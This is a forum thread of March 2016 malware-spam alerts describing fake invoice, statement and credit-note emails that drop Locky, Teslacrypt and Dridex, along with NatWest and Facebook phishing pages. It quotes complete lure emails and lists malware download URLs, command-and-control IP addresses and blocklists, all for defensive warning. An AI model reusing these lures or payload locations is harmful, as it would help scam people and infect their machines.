2072 replies to this topic

[AplusWebMaster]

FYI...

Fake 'Credit Note' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
22 Mar 2016 - "An email with the subject of 'Credit Note CN-73290' from On Semiconductor Corp for [redacted] (0312) pretending to come from Accounts <message-service@ post.xero .com> with a zip attachment is another one from the current bot runs which downloads ransomware... These don’t look like either Locky or Teslacrypt ransomware so it appears that another gang of bad actors are using the same email templates as the 2 prolific malspammers to spread their version of ransomware. One example of the email looks like:
From: Accounts <message-service@ post.xero .com>
Date: Tue, 22 Mar 2016 04:38:32
Subject: Credit Note CN-73290 from On Semiconductor Corp for [victim company ] (0312)
Attachment: Credit Note CN-73290.zip
    Hi Kris,
    Attached is your credit note CN-73290 for 52611.30 AUD.
    This has been allocated against invoice number
    If you have any questions, please let us know.
    Thanks,
    McKesson Corporation ...

22 March 2016: Credit Note CN-73290.zip: Extracts to: Credit Note CN-64451.js
.. Current Virus total detections 2/56*. MALWR** shows a download of some sort of ransomware from
 http ://www .frontlinecarloans .com.au/public/js/bin.exe (VirusTotal 6/56***) (Hybrid Analysis [1]) (MALWR [2])
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458611843/

** https://malwr.com/an...zhjNzI3OWEyY2E/
Hosts
103.4.18.250: https://www.virustot...50/information/
>> https://www.virustot...2af2b/analysis/
104.27.151.145
23.99.222.162

*** https://www.virustot...sis/1458626108/
TCP connections
104.27.151.145

1] https://www.hybrid-a...environmentId=4
Contacted Hosts
104.27.150.145

2] https://malwr.com/an...GUwMDBlMmMwYzk/
Hosts
104.27.150.145
23.101.187.68
104.27.151.145
___

Fake 'Blank 2' SPAM - word macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
22 Mar 2016 - "An email with a completely blank / empty body with the subject of 'Blank 2' pretending to come from Steve Gale <steve1gales@ gmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Steve Gale <steve1gales@ gmail .com>
Date: Tue 22/03/2016 09:19
Subject: Blank 2
Attachment: Blank 2.docm

Body content: completely empty

22 March 2016: Blank 2.docm - Current Virus total detections 6/56*
.. MALWR** shows a download from http ://www .lightningstars .in/system/logs/87h76hghuhi.exe (VirusTotal 5/56***)
 which is inconclusive but looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458638302/

** https://malwr.com/an...TNmZjFmMmVjOTM/
Hosts
162.144.73.194: https://www.virustot...94/information/
>> https://www.virustot...7f32f/analysis/

*** https://www.virustot...sis/1458637560/
___

Fake 'Statement' SPAM - JS malware leads to Locky Ransomware
- https://myonlinesecu...cky-ransomware/
22 Mar 2016 - "An email with the subject of 'FW: Statement S#327763' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... One example of the emails looks like:
From: Luis Wagner <WagnerLuis4446@ newthoughtcenterofhawaii .com>
Date: Tue 22/03/2016 09:03
Subject: FW: Statement S#327763
    Dear ans,
    Please find attached the statement (S#327763) that matches back to your invoices.
    Can you please sign and return.
    Best regards,
    Luis Wagner
    Business Development Director

22 March 2016: statement_ans_327763.zip: Extracts to -3- .JS files - 2 are identical & 1 different
.. Current Virus total detections [1] [2]:  MALWR*  shows -both- download Locky Ransomware from
 http ://alexsolenni .it/pol4dsf (VirusTotal 3/57**). This zip file contains -3- js files and an -unknown- file that when examined is actually empty... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1458641040/

2] https://www.virustot...sis/1458641075/

* https://malwr.com/an...GJmNGIzODA0ODI/
Hosts
178.237.15.128: https://www.virustot...28/information/
92.63.87.106: https://www.virustot...06/information/

** https://www.virustot...sis/1458641975/
TCP connections
92.63.87.106
___

Fake 'HP' SPAM - RTF macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
22 Mar 2016 - "An email that appears to come from HP (Hewlett Packard Enterprises) with the subject of 'Urgent: F400572 HARGREAVES LANSDOWN PLC/ HPE' coming from random names and email addresses with a malicious word doc RTF attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...PE-1024x906.png

5 March 2016: fillout_DAINV13955_derek.rtf - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://connect.act-sat-bootcamp .com/dana/home.php
 which gave me hpe.jpg (which is -renamed- .exe file and not any sort of image file) (VirusTotal 3/57***)
 Detections are inconclusive but likely to be Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458642936/

** https://malwr.com/an...jNjMTI2MjdhM2U/
Hosts
91.240.86.234: https://www.virustot...34/information/
>> https://www.virustot...b1072/analysis/

*** https://www.virustot...sis/1458642865/
___

Fake 'bodily injury' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
22 Mar 2016 - "An email with the subject of 'You are being accused with bodily injury (Case: 02172723)' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads what looks like Teslacrypt ransomware...

Screenshot: https://myonlinesecu...23-1024x447.png

5 March 2016: post_scan_02172723.zip: Extracts to: post_pgfEUf.js - Current Virus total detections 5/57*
.. MALWR**  shows a download of what looks like Teslacrypt but might just be Locky from
 http ://isityouereqq .com/80.exe?1(VirusTotal 5/57***) -Both- Locky and Teslacrypt have used the -same- servers and -same- file names over the last few weeks... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458652839/

** https://malwr.com/an...zU1OTgxZjQwOGM/
Hosts
185.118.142.154: https://www.virustot...54/information/

*** https://www.virustot...sis/1458654208/
___

'Re-activate your Online Banking' – NatWest PHISH
- https://myonlinesecu...-bank-phishing/
22 Mar 2016 - "There are a few major common subjects in a phishing-attempt. Lots of them are either PayPal or your Bank or Credit Card, with a message saying some thing like:
    Urgent: Your card has been stopped !
    There have been unauthorised or suspicious attempts to log in to your account, please verify
    Your account has exceeded its limit and needs to be verified
    Your account will be suspended !
    You have received a secure message from < your bank>
    We are unable to verify your account information
    Update Personal Information
    Urgent Account Review Notification
    We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
    Confirmation of Order
    Re-activate your Online Banking

The original email looks like this:

Screenshot: https://myonlinesecu...ng-1024x554.png

... the site the link goes to http ://linkage .org.uk//new_website/online/personal-natwest/Log-in.php
 where a pop up asks you to download what appears to be the genuine Trusteer rapport security software:
> https://myonlinesecu...up-1024x547.png
... if you close then pop up & then fill in the email address and password [DON'T] you get a typical phishing page that looks very similar to a genuine Nat west bank page, if you don’t look carefully at the URL in the browser address bar... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or click-the-link in the email..."

linkage .org.uk: 37.61.235.162: https://www.virustot...62/information/
>> https://www.virustot...96afb/analysis/
___

“Copyright Violation” > Facebook Phish
- https://blog.malware...facebook-phish/
Mar 22, 2016 - "... we’ve spotted a phishing-scam using them as a launchpad for data theft. The name of the game is worrying the potential victim into clicking-on-the-supplied-link, with a curious mix of copyright violations and account verification. Here’s an example:
> https://blog.malware...fbcopyscam1.png
As you may have guessed, Facebook doesn’t issue copyright notices then direct you to apps pages. The 'Apps page' on offer here is a 'Get Verified' effort, complete with request for name, email/phone, password, profile link and 'comments':
> https://blog.malware...fbcopyscam2.jpg
We reported the page to Facebook, and it is now offline:
> https://blog.malware...fbcopyscam3.jpg
'Verify your account' -scams- are fairly old, but throwing tall tales of copyright issues into the mix for that extra sheen of panic isn’t quite as common. Always do your best to keep your logins safe and, if in doubt, go to the site owners directly..

–never- enter your credentials into a -link- sent your way in -random- Facebook messages."
 

  

Edited by AplusWebMaster, 22 March 2016 - 09:48 AM.

[AplusWebMaster]

FYI...

Fake 'electronic invoice' SPAM - rtf macro malware
- https://myonlinesecu...-macro-malware/
23 Mar 2016 - "Following on from this malspam run yesterday* is today’s similar run with emails with the same subjects pretending to be 'your latest electronic invoice from D.E. Web Works' with a malicious word doc RTF attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking Trojans like Dridex or Dyreza and ransomware like Locky, cryptolocker or Teslacrypt...
* https://myonlinesecu...eads-to-dridex/
One of the emails looks like:
From: Brandie Everett <Everett.Brandie19@ business.telecomitalia .it> (random senders)
Date: Wed 23/03/2016 10:34
Subject: Urgent: F137648 MFI Group/ HPE
Attachment: inv_839922034.rtf
        MFI Group
        Invoice Due:03/31/2016 IJINV71859     Amount Due: $898.68     
    Dear Customer: Here is your latest electronic invoice from D.E. Web Works. If your invoice is not attached as a PDF, you can change your preference in the ?Invoice Summary? section at the bottom of this email. If you wish for your invoices to go to someone different in your organization, just reply to this email and let us know. For your convenience, mail your payment to the address listed on the invoice. Please note that if we have you set up for automatic billing to your credit card or ACH, you will still receive this email, but the balance due will reflect a zero balance. If it does not reflect a zero balance, please contact us immediately. If you have questions about the invoice you have received, please feel free to reply to this email or call us... Electronic invoicing is just one more way that D.E. Web Works is doing its part to give back to the environment. For more information about our environmental initiative,contact us Thank you for helping us be Part of the Solution. We sincerely appreciate your business. MFI Group ...

23 March 2016: inv_839922034.rtf - Current Virus total detections 2/57*
.. MALWR** shows a download from http ://wrkstn09.peoriaseniorband .com/dana/home.php which gave me runwithme.exe. The analysis is inconclusive. (VirusTotal 4/56***) but is highly likely to be Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458736152/

** https://malwr.com/an...jA3NTg5MTE2NTI/
Hosts
109.237.108.25: https://www.virustot...25/information/
>> https://www.virustot...7ab77/analysis/

*** https://www.virustot...sis/1458736404/
___

Fake 'Back Office: Invoice' SPAM - rtf macro malware
- https://myonlinesecu...-macro-malware/
23 Mar 2016 - "An email with the subject of 'The Back Office : Invoice (MJINV78470)' pretending to come from random senders with a malicious word doc RTF attachment is another one from the current bot runs... The alleged sender’s name matches the name in the body of the email. The invoice number is random but matches the attachment name & number. One of the emails looks like:
From: Vincenzo Mann <Mann.Vincenzo42@ vyas .com>
Date: Wed 23/03/2016 12:22
Subject: The Back Office : Invoice ( MJINV78470 )
Attachment: backoffice_MJINV78470.rtf
    03/23/2016
    Please see the attached PDF File for account MJINV78470 in the amount of $
    583.44. This Invoice MJINV78470 is due on 03/23/2016.
    To view and/or print e-bills, you will need Microsoft Office Word installed on your computer.
    If you have any questions or need further assistance, please send a reply.
    Please include your name, address, and user name in your message.
    Please do not reply to this message.
    Thank you.
    Vincenzo Mann
    The Back Office

23 March 2016: backoffice_MJINV78470.rtf - Current Virus total detections 2/57*
.. MALWR** shows it downloads http ://wrkstn09.satbootcampaz .com/dana/home.php which delivered
 runwithme.exe (VirusTotal 4/56***). This is the same downloaded malware as described HERE[1]... looks like a password stealer and Banking Trojan. It might be Dridex or might be Vawtrk[2]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458739404/

** https://malwr.com/an...jIwMWVjMmY1NTY/
Hosts
109.237.108.25: https://www.virustot...25/information/
>> https://www.virustot...e670d/analysis/

*** https://www.virustot...e670d/analysis/

1] https://myonlinesecu...-macro-malware/

2] https://blogs.mcafee...erving-vawtrak/
 

 

Edited by AplusWebMaster, 23 March 2016 - 08:17 AM.

[AplusWebMaster]

FYI...

Fake 'Your order' SPAM - malicious attachment
- http://blog.dynamoo....r-has-been.html
24 Mar 2016 - "This -fake- financial spam does -not- come from Axminster Tools & Machinery, but is instead a simple -forgery- with a malicious attachment:
    From:    customer.service@ axminster .co.uk
    Date:    24 March 2016 at 10:11
    Subject:    Your order has been despatched
    Dear Customer
    The attached document provides details of items that have been packed and are ready for despatch.
    Please use your tracking number (contained within the attached document) to monitor the progress of your shipment.
    Customer Services ...

Attached is a file LN4244786.docm which comes in at least two different versions (VirusTotal results [1] [2]). Automated analysis is inconclusive.. however a manual analysis of the macros contained within.. show download locations at:
skandastech .com/76f45e5drfg7.exe
ekakkshar .com/76f45e5drfg7.exe
This binary has a detection rate of 6/56* and the Deepviz Analysis** and Hybrid Analysis*** show network traffic to:
71.46.208.93 (Bright House Networks, US)
64.76.19.251 (Level 3 Communications US, 64.76.19.251 / Impsat, Argentina)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
64.147.192.68 (Dataconstructs, US)
41.38.18.230 (TE Data, Egypt)
93.104.211.103 (Contabo, Germany)
159.8.57.10 (Kordsa Global Endustriyel Iplik, Turkey / SoftLayer Technologies, Netherlands)
82.144.200.154 (Kyivski Telekomunikatsiyni Merezhi LLC, Ukraine)
5.9.43.177 (Hetzner, Germany)
212.126.59.41 (LetsHost, Ireland)
It is not clear what the payload is here, but it is likely to be the Dridex banking trojan or possibly ransomware.
Recommended blocklist:
71.46.208.93
64.76.19.251
91.236.4.234
64.147.192.68
41.38.18.230
93.104.211.103
159.8.57.10
82.144.200.154
5.9.43.177
212.126.59.41 "
1] https://www.virustot...c0f8b/analysis/

2] https://www.virustot...c2cb3/analysis/

* https://www.virustot...sis/1458816089/

** https://sandbox.deep...95a3781bd5c2f1/

*** https://www.hybrid-a...environmentId=4

- https://myonlinesecu...-macro-malware/
24 Mar 2016 - "An email with the subject of 'Your order has been despatched' pretending to come from customer.service@axminster .co.uk with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: customer.service@ axminster .co.uk
Date: Thu 24/03/2016 08:43
Subject: Your order has been despatched
Attachment: LN4244786.docm
    Dear Customer
    The attached document* provides details of items that have been packed and are ready for despatch.
    Please use your tracking number (contained within the attached document) to monitor the progress of your shipment.
    Customer Services ...

24 March 2016: LN4244786.docm - Current Virus total detections 6/57*
.. Update: I have been reliably informed[1] that there are -several- versions of this macro word doc that will download Dridex from skandastech .com/76f45e5drfg7.exe -or- ekakkshar .com/76f45e5drfg7.exe
(VirusTotal 6/56**)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458808762/

** https://www.virustot...sis/1458814484/

1] https://twitter.com/...952076117155840
___

Fake 'Payment Receipt' SPAM - leads to Locky ransomeware
- http://blog.dynamoo....ceipt-from.html
24 Mar 2016 - "This -fake- financial spam comes from random recipients, for example:
    From:    Marta Wood
    Date:    24 March 2016 at 10:10
    Subject:    FW: Payment Receipt
    Dear [redacted],
    Thank you for your payment. It is important that you print this receipt and record the receipt number as proof of your payment.
    You may be asked to provide your receipt details should you have an enquiry regarding this payment.
    Regards,
    Marta Wood
    Technical Manager - General Insurance

Attached is a ZIP file that incorporates the recipients name plus a word such as 'payment, details or receipt' plus a random number. This achive contains a randomly-named script (starting with "PM") and ending with .js.js plus which appear to be a set of hidden .BIN files which may well be junk. VirusTotal detection rates for the scripts are fairly low (examples [1] [2]..). Automated analysis [7] [8].. shows binary download locations at:
stie.pbsoedirman .com/msh4uys
projectpass .org/o3isua
natstoilet .com/l2ps0sa [404]
yourhappyjourney .com/asl2sd [404]
Two of locations are 404ing, the two that work serve up a different binary each. There are probably many more download locations and more binaries... The VirusTotal results for the binaries [19] [20] indicate that this is ransomware, specifically it is Locky. Automated analyses [21] [22].. show it phoning home to:
195.123.209.123 (ITL, Latvia)
107.181.187.228 (Total Server Solutions, US)
217.12.218.158 (ITL, Netherlands)
46.8.44.39 (PE Dunaeivskyi Denys Leonidovich, Ukraine)
... Recommended blocklist:
195.123.209.123
107.181.187.228
217.12.218.158
46.8.44.39 "
1] https://www.virustot...535ca/analysis/

2] https://www.virustot...sis/1458819009/

7] https://malwr.com/an...DZhNTEzYmI0ZTE/

8] https://malwr.com/an...TgzZjc0NWFiYjk/

19] https://www.virustot...sis/1458819857/

20] https://www.virustot...sis/1458819870/

21] https://sandbox.deep...404214fb0c8251/

22] https://sandbox.deep...9067322c7906b0/
___

Fake 'Sixt Invoice' SPAM - word macro malware
- https://myonlinesecu...d-macro-malware
24 Mar 2016 - "An email with the subject of 'Sixt Invoice: 0252056792' from 24.03.2016 (random numbers)   pretending to come from random, names, companies and email addresses with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...16-1024x780.png

24 March 2016: Sixt_receipt_49200616.doc - Current Virus total detections 2/56*
.. downloads from http ://web-intra.fhc-inc .org/live/essentials.php which gave me
 65a7fwgybid.xls (VirusTotal 5/56**) which is actually an .exe file -not- an XLS excel spreadsheet
-despite- the file name & icon... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458833067/

** https://www.virustot...sis/1458832875/

> https://www.hybrid-a...environmentId=4
Sixt_receipt_15768471.doc
Contacted Hosts
92.63.100.7: https://www.virustot....7/information/
>> https://www.virustot...ac558/analysis/
38.64.199.113: https://www.virustot...13/information/
>> https://www.virustot...f2a17/analysis/
79.124.67.226: https://www.virustot...26/information/
>> https://www.virustot...c1e3c/analysis/
222.255.121.202: https://www.virustot...02/information/
>> https://www.virustot...77124/analysis/
47.88.191.14: https://www.virustot...14/information/
>> https://www.virustot...f7417/analysis/
197.96.139.253: https://www.virustot...53/information/
>> https://www.virustot...67c24/analysis/
 

  

Edited by AplusWebMaster, 24 March 2016 - 10:39 AM.

[AplusWebMaster]

FYI...

Fake 'Invoice Copy' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
25 Mar 2016 - "Although it is Good Friday... the Locky ransomware campaign continues unabated with an email with the subject of 'FW: Invoice Copy' pretending to come from a random or unknown name at your own email address with a zip attachment is another one from the current bot runs which downloads Locky ransomware...One of the emails looks like:
From: Stacie Tucker <fax@ [redacted] .co.uk> [Your own email address]
Date: Fri 25/03/2016 09:03
Subject: FW: Invoice Copy
Attachment: copy-fax_323571.zip
    Dear fax,
    Please review the attached copy of your Invoice (number: IN323571) for an amount of $4031.15.
    Thank you for your business.
    Stacie Tucker
    Director, Digital Communications

25 March 2016: copy-fax_323571.zip: Extracts to: PMTac2edf.js.js Current Virus total detections 1/58*
.. MALWR** shows a download of Locky ransomware from
 http ://holidaysinkeralam .com/ke4uad (VirusTotal 6/58***). Other download locations so far discovered include:
 http ://goldenlifewomen .com/o3isvs (VT[1])
 http ://fssblangenlois .ac.at/k3idv (VT[2])
 http ://warrendotwarren .url.ph/ldpeo3s (VT[3])
... more detailed breakdown, including the multitude of hosts and differing file #’s delivering today’s malware can be found HERE[4] courtesy of Techelplist. This zip file contains 2 js files and 3 dat files that when examined is actually -empty- ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458900076/

** https://malwr.com/an...zk4NzgwNGM2MmQ/
Hosts
184.168.47.225
93.170.104.127

*** https://www.virustot...sis/1458901000/
TCP connections
89.108.84.132

1] https://www.virustot...sis/1458910253/
TCP connections
185.117.72.94

2] https://www.virustot...sis/1458910585/
TCP connections
89.108.84.132

3] https://www.virustot...sis/1458911035/
TCP connections
185.117.72.94

4] https://otx.alienvau...37f23a0c0f414d/
 

  

[AplusWebMaster]

FYI...

Fake 'Overdue Incoices' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
28 Mar 2016 - "... mispelled subject of 'FW: Overdue Incoices' pretending to come from random senders with a zip attachment is another one from the current bot runs which downloads Locky ransomware... One of the emails looks like:
From: Boyce Day <DayBoyce99@ armadev .com>
Date: Mon 28/03/2016 09:09
Subject: FW: Overdue Incoices
Attachment: sexy123_copy_489051.zip
    Dear sexy123,
    Please find attached copy updated statement as your account has 3 overdue incoices.
    Is there any reasons why they haven’t yet been paid?
    Best Wishes,
    Boyce Day
    Vice President Finance

28 March 2016: sexy123_copy_489051.zip: Extracts to: SCN734815.txt.js - Current Virus total detections 2/58*
.. MALWR** and Hybrid Analysis[3] show a download of Locky ransomware from
 http ://www.suansawanresort .com/n7eua (VirusTotal 6/58[4])
Other download locations so far discovered include
    http ://bbwsa .com/m7rysa
    http ://dukeplasticslab .com/j47akfa
    http ://foothillsofhemet .com/k4sifs
    http ://www.stopeugenicsnow .eu/m8dhs
    http ://blackmountaintipis .com/mxn3aad
This zip file contains 3 js files and 3 unknown files that when examined is actually empty (full of 0 byte padding, actually a mix of 0 & 1)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459152409/

** https://malwr.com/an...jcyZGJiYmJmOTY/
Hosts
192.254.235.178
84.19.170.249: https://www.virustot...49/information/
>> https://www.virustot...fcd59/analysis/

3] https://www.reverse....environmentId=4
Contacted Hosts
192.254.235.178
92.63.87.134: https://www.virustot...34/information/
>> https://www.virustot...0cae1/analysis/

4] https://www.virustot...sis/1459152904/
TCP connections
78.46.170.79
___

Fake 'FW:' attached invoice SPAM - JS leads to Locky Ransomware
- https://myonlinesecu...ment-js-malware
28 Mar 2016 - "... an email with the subject of 'FW:' pretending to come from random senders with a zip attachment is another one from the current bot runs which downloads... Locky Ransomware... The email looks like:
From: Random senders
Date: Mon 28/03/2016 09:47
Subject: FW:
Attachment: copy_ellie_734294.zip
    Please see the attached invoice and remit payment according to the terms listed at the bottom of the invoice.
    If you have any questions please let us know.

5 March 2016: copy_ellie_734294.zip: Extracts to a folder named 'warning' which contains -2- files both appearing to have -same- content although different file # ticket_613588769.js VT 0/57[1] and
 125_ticket_942667766.lib VT 0/57[2]. MALWR[3] shows a download from
 http ://twocircles .in/HwgIY9 .exe (VirusTotal 5/58[4]) which is inconclusive in detections but MALWR[5] shows contacts of innocent files from Microsoft Update. Hybrid analysis[6] definitely shows Locky Ransomware...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1459155351/

2] https://www.virustot...sis/1459155491/

3] https://malwr.com/an...jIxZWRiMWFhNDg/

4] https://www.virustot...sis/1459155069/

5] https://malwr.com/an...mEzMjMwY2ZjYjc/
Hosts
184.25.56.84

6] https://www.hybrid-a...environmentId=4
Contacted Hosts
66.160.196.39: https://www.virustot...39/information/
>> https://www.virustot...b153c/analysis/
83.217.8.127
___

Fake 'Document(1).pdf' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
28 Mar 2016 - "An email that tries to make you think it is coming from your own email domain/company with the subject of 'Document(1).pdf' pretending to come from netadmin <nadiam1pa@ your email domain .tld> with a zip attachment is another one from the current bot runs which downloads some sort of ransomware... The email looks like:
From: netadmin <nadiam1pa@ your email domain .tld>
Date: Document (1).pdf
Subject: Document (1).pdf
Attachment: Document (1).zip
    Document (1).pdf

28 March 2016: Document (1).zip: Extracts to:  FDV4328982511.js - Current Virus total detections 7/57*
.. MALWR** shows a download of this ransomware file from
 http ://store.brugomug .co.uk/765f46vb.exe (VirusTotal 3/58***) MALWR[4]...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459173075/

** https://malwr.com/an...DY4NzIxNjg0YzA/
Hosts
50.56.106.21
84.19.170.249: https://www.virustot...49/information/
>> https://www.virustot...d2673/analysis/

*** https://www.virustot...sis/1459171814/
TCP connections
91.200.14.73

4] https://malwr.com/an...GI3YTJhNzk5NDE/
Hosts
91.200.14.73: https://www.virustot...73/information/
>> https://www.virustot...adf21/analysis/

store.brugomug .co.uk: 50.56.106.21: https://www.virustot...21/information/
>> https://www.virustot...4778e/analysis/
___

Fake 'invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
28 Mar 2016 - "An email with the subject of [random company name] 'invoice' – [recipient domain] pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... One of the emails looks like:
From: Random senders
Date: Mon 28/03/2016 16:04
Subject: CERAMIC FUEL CELLS Invoice ...
Attachment: Invoice Number 1460847 – Issue Date 02166113.rtf
    Sent from my iPad
    Begin forwarded message:
    Thank you for choosing CERAMIC FUEL CELLS! We hope you enjoy our new invoice format. In our effort to be more environmentally friendly, our new invoice saves paper yet provides all of the same information in a more condensed format. Please let us know if you have any questions or concerns.

28 March 2016: Invoice Number 1460847 – Issue Date 02166113.rtf - Current Virus total detections 4/57*
.. MALWR shows a download from
 http ://store.clarksvillevw .com/smartphones/iphonese.php which gave me 122.wav which is -NOT- a wav file despite appearing to be able to be played in windows explorer - but is a renamed .exe file
(VirusTotal 3/58**). This will probably turn out to be either Dridex or Locky ransomware, but analysis is pending...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459177325/

** https://www.virustot...sis/1459177386/

store.clarksvillevw .com: 185.118.166.167: https://www.virustot...67/information/
>> https://www.virustot...0987c/analysis/
___

Fake 'TERREDOC' SPAM - malicious attachment
- http://blog.dynamoo....sage-9758w.html
28 Mar 2016 - "This French-language -spam- comes with a malicious attachment:
    From:    Christine Faure [c.faure@ technicoflor .fr]
    Date:    28 March 2016 at 16:54
    Subject:    Envoi d’un message : 9758W-TERREDOC-RS62937-15000
    Votre message est prêt à être envoyé avec les fichiers ou liens joints suivants :
    9758W-TERREDOC-RS62937-15000
    Message de sécurité

To save you putting it into 'Google Translate', the body text reads:
'Your message is ready to be sent with the following file or link attached'...
Attached is a file 9758W-TERREDOC-RS62937-15000.zip which comes in at least -eight- different versions each containing a -different- malicious-script (VirusTotal results [1] [2]... The Malwr reports for those samples [9] [10]... show a malicious binary downloaded from:
store.brugomug.co.uk/765f46vb.exe
ggbongs .com/765f46vb.exe
dragonex .com/765f46vb.exe
homedesire .co.uk/765f46vb.exe
scorpena .com/765f46vb.exe
pockettypewriter .co.uk/765f46vb.exe
enduro .si/pdf/765f46vb.exe
185.130.7.22 /files/qFBC5Y.exe
Note that the last file is not like the others. There may be other download locations. The "765f46vb" binary has a detection rate of 4/57* and according to all those previous reports... the malware phones home to:
83.217.8.127 (Park-web Ltd, Russia)
84.19.170.249 (300GB.ru, Russia / Keyweb, Germany)
185.117.72.94 (Host Sailor, Netherlands)
91.200.14.73 (SKS-Lugan, Ukraine)
92.63.87.134 (MWTV, Latvia)
176.31.47.100 (OVH, Germany / Unihost, SC)
All of those look like pretty shady neigbourhoods, although I haven't examined them closely at this point. The payload is the Locky ransomware. The other binary appears to be -another- version of Locky which appears to phone home to the -same- servers.
Recommended blocklist:
83.217.8.127
84.19.170.249
185.117.72.94
91.200.14.73
92.63.87.134
176.31.47.100 "
1] https://www.virustot...a0b48/analysis/

2] https://www.virustot...sis/1459182332/

9] https://malwr.com/an...jE2NjAxYjQ1NTY/
Hosts
77.234.131.73
109.235.139.64
185.130.7.22

10] https://malwr.com/an...mM2ZmE1NmI1MjI/
Hosts
50.56.106.21
83.217.8.127

* https://www.virustot...fdb31/analysis/
TCP connections
91.200.14.73
 

  

Edited by AplusWebMaster, 28 March 2016 - 12:44 PM.

[AplusWebMaster]

FYI...

Fake 'Credit Card Declined' SPAM - JS malware
- https://myonlinesecu...764-js-malware/
29 Mar 2016 - "An email with the subject of 'Credit Card Has Been Declined *9764' [random numbered] pretending to come from random senders  with a zip attachment is another one from the current bot runs which downloads what looks like it is supposed to be locky ransomware... The email looks like:
From: Shirley brackenbury <brackenburyShirley12280@ covertech .com.br>
Date: Tue 29/03/2016 10:03
Subject: Credit Card Has Been Declined *9764
Attachment: copy_ellie_631312.zip
    Your credit card has been declined, cancellation notice is enclosed down below.

29 March 2016: copy_ellie_631312.zip: Extracts to: info_614949608.js and a copy named 290_info_571294222.lib
 Current Virus total detections 0/58*. MALWR** shows an attempted download from
 http ://teknosolar .com/CLVrSc.exe which is currently giving a 404 not found...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459242165/

** https://malwr.com/an...zRkZGZkYzgwNzM/
Hosts
185.18.196.201: https://www.virustot...01/information/
>> https://www.virustot...37dba/analysis/
___

Fake 'Payment' SPAM – doc macro malware
- https://myonlinesecu...-macro-malware/
29 Mar 2016 - "An email with the subject of [random name] 'payment/invoice/report/message/Transaction' pretending to come from the same random name but a totally different email address with a random numbered malicious word doc attachment is another one from the current bot runs... One of the emails looks like:
From: Emerson Sherman <accounts@ rapicutcarbides .com>
Date: Tue 29/03/2016 05:10
Subject: Emerson Sherman. Payment
Attachment: 14385.doc
    Good day
    I hope you had a good weekend.
    Please find the payment confirmation enclosed with this email. The Transfer should appear on your bank within 1 day.  
    Thanks
    Emerson Sherman

29 March 2016: 14385.doc - Current Virus total detections 8/58[1] 7/57[2]
.. Payload Security* shows a download from http ://www .setabayloan .com/sg1.jpg?YSbs= which gave 585816.exe
(VirusTotal 9/57**) and is definitely Dridex banking Trojan. This Dridex affiliate uses jpg images on a website that the macro decodes and extracts the .exe file. That way a victim only sees the genuine image in their temp folders or briefly displayed...
> https://myonlinesecu...setabayloan.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1459229375/

2] https://www.virustot...sis/1459226242/

* https://www.reverse....environmentId=4
Contacted Hosts
